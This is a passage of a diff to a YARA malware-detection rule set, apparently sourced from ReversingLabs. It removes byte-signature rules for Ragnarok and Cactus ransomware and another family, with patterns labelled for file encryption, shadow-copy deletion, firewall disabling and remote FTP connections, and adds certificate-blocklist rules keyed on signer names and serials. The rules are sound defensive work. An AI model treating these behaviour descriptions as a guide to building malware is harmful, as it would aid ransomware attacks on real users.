-            81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ??
-            50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 43 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? C6 85
-            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 EB ?? 8B 43 ?? 89
-            85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ??
-            89 B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B D8 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 FF 05 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ??
-            ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 8B 83
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 68 ?? ?? ?? ?? 66 8B 83
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ??
-            ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7
-            83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55
-            ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ??
-            6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 76 ?? E8 ?? ?? ?? ?? 66 89 B3 ??
-            ?? ?? ?? 66 C7 45 ?? ?? ?? 66 C7 45 ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 0F B7 C6 50 E8 ?? ?? ?? ?? 66 81 BB ?? ?? ?? ?? ?? ?? 75 ?? 8D 4D ?? 66 BA
-            ?? ?? 8B C3 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 0F B7 83 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? FF 0D ?? ?? ??
-            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
-        }
-		$remote_ftp_connection = {
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66
-            8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ??
-            ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ?? ?? 75 ?? B9
-            ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66 8B 80
-            ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74
-            ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 83 B8
-            ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ?? 8D 55 ?? 8B 5D ?? 8B 83
-            ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45
-            ?? 8A 80 ?? ?? ?? ?? 2C ?? 72 ?? 74 ?? FE C8 74 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
-            45 ?? FF B0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8B 45 ?? 8B 88
-            ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18
-            FF 53 ?? EB ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ??
-            80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ??
-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ??
-            8B 45 ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8
-            ?? ?? ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ??
-            B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ??
-            ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D
-            45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45
-            ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ??
-            ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ??
-            8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $do_dll_stuff_and_create_thread and $find_files and $remote_connection and $remote_ftp_connection
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Baltservis LLC" and ( pe.signatures [ i ] . serial == "00:b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" or pe.signatures [ i ] . serial == "b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" ) and 1604102400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ragnarok : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ragnarok ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "263a671e-dfdb-5ab8-9bb9-355c76a88c10"
-		date = "2020-07-07"
-		modified = "2020-07-15"
+		id = "8b050402-d5d3-5733-9a72-02386d850a04"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ragnarok.yara#L1-L110"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14914-L14930"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "aaa17ab98b59a5c8c71a2b82a9bf29dd3a1a1719deaf08a3bafa77895bc10311"
+		logic_hash = "0bb14ececa3a78e1a2e71cfdee8bc57678251b15151d156ef5fa754b2438ee35"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ragnarok"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 8B E5 5D C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8
-            ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            75 ?? FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B
-            5D ?? 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59
-            EB ?? 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF
-            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
-            C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C
-            ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95
-            ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53
-            57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ??
-            74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ??
-            ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8
-        }
-		$find_files_p2 = {
-            83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF
-            15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ??
-            89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ??
-            ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80
-            38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ??
-            ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ??
-            2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
-            83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 8B 4D ?? 56 57 89
-            85 ?? ?? ?? ?? 33 FF 33 C0 89 8D ?? ?? ?? ?? 6A ?? 51 89 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 70 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 8A 0E
-            3A 08 75 ?? 84 C9 74 ?? 8A 4E ?? 3A 48 ?? 75 ?? 83 C6 ?? 83 C0 ?? 84 C9 75 ?? 33 C0
-            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8
-            68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 8B 40 ?? 8B F8 E8 ?? ?? ?? ??
-            33 D2 B9 ?? ?? ?? ?? F7 F1 8A 04 3A 88 04 1E 46 83 FE ?? 7C ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 33 C9 23 F9 89 8D ?? ?? ?? ?? 3D ?? ?? ?? ??
-            0F 87 ?? ?? ?? ?? 48 83 E0 ?? 83 C0 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF
-        }
-		$encrypt_files_p2 = {
-            0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ??
-            ?? 83 C4 ?? 33 FF 3B B5 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 3B 85 ?? ?? ?? ?? 0F 85
-            ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ??
-            ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 53 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 85 ?? ?? ??
-            ?? 57 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 57 6A ??
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 3B 85 ?? ?? ?? ?? 75 ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 33 FF 56 E8
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 5B 85 C0 74 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 33 CD
-            5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$disable_fw_and_delete_shadow_volumes = {
-            6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 74 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D7 E9 ?? ??
-            ?? ?? 6A ?? FF 35 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ??
-            50 FF 35 ?? ?? ?? ?? FF D3 6A ?? FF 35 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 8B 48 ?? 51
-            FF 35 ?? ?? ?? ?? FF D3 8B F8 8D 85 ?? ?? ?? ?? 50 FF D6 8D 45 ?? 50 8D 85 ?? ?? ??
-            ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 40 ?? 50 6A ?? FF 95 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ??
-            ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ??
-            FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $disable_fw_and_delete_shadow_volumes ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "1d:ab:ae:61:67:05:f5:a5:11:52:ea:c4:84:23:f3:54" and 1470960000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Cactus : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cactus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f391919a-b433-5f8d-8051-f0467118fa1b"
-		date = "2023-12-15"
-		modified = "2023-12-15"
+		id = "f315cdda-4b95-534d-94db-9a04e2da6385"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Cactus.yara#L1-L190"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14932-L14948"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2953b67e926cb653df0de208b098da3d5c16e6690842ab28fbf8c37cd16f54d7"
+		logic_hash = "ca613e4b45b9bb1ef7564b9fc6321bccc0f683298de692a3db2bf841db9010ef"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cactus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 41 57 41 56 41 55 41 54 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24
-            ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            89 85 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 4C 8D 4D
-            ?? 4C 8D 45 ?? 48 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48
-            89 54 24 ?? 48 8B 95 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 CA 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 45 ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA
-            48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C2
-            48 8D 85 ?? ?? ?? ?? 41 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D
-        }
-		$encrypt_files_p2 = {
-            95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ??
-            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 48 83 C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95
-            ?? ?? ?? ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 29
-            C2 48 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 39 85 ?? ?? ?? ?? 0F 8D ?? ?? ??
-            ?? 48 89 E0 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 85 C0 48 0F 48 C2 48 C1 F8
-            ?? 48 C1 E0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 43 ?? 48 89 85 ?? ??
-            ?? ?? 48 89 D8 49 89 C4 41 BD ?? ?? ?? ?? 48 89 D8 49 89 C6 41 BF ?? ?? ?? ?? 48 89
-            D8 48 83 C0 ?? 48 C1 E8 ?? 48 C1 E0 ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D 44 24 ?? 48 83
